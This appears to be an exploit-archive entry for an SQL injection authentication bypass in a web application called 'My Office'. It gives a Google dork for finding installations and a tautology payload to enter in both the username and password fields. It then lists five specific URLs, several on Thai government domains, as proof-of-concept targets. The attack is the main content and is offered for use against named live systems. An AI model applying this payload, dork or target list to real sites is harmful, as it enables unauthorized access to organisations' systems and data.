My Office SQL Injection Authentication Bypass

2020.09.29

MeXe (TR)

Risk: Medium

Local: Yes

Remote: Yes

CVE: N/A

CWE: N/A

Dork: "My Office 2563"

# Exploit Title: My Office SQL Injection Authentication Bypass
# Exploit Author: MeXe
# Date: 2020-09-27
# Google Dork: "My Office 2563"
# Version: All versions

Username: 'or 1=1 or ''='
Password: 'or 1=1 or ''='

#POC:

http://myoffice.trang2.go.th/myoffice/2563/index.php
http://office.sea12.go.th/
http://www.myoffice.mathayom9.go.th/
http://my2562.ict39.net/
http://myoffice.sesao14.org/myoffice/2563/

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

My Office SQL Injection Authentication Bypass

Dork: "My Office 2563"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.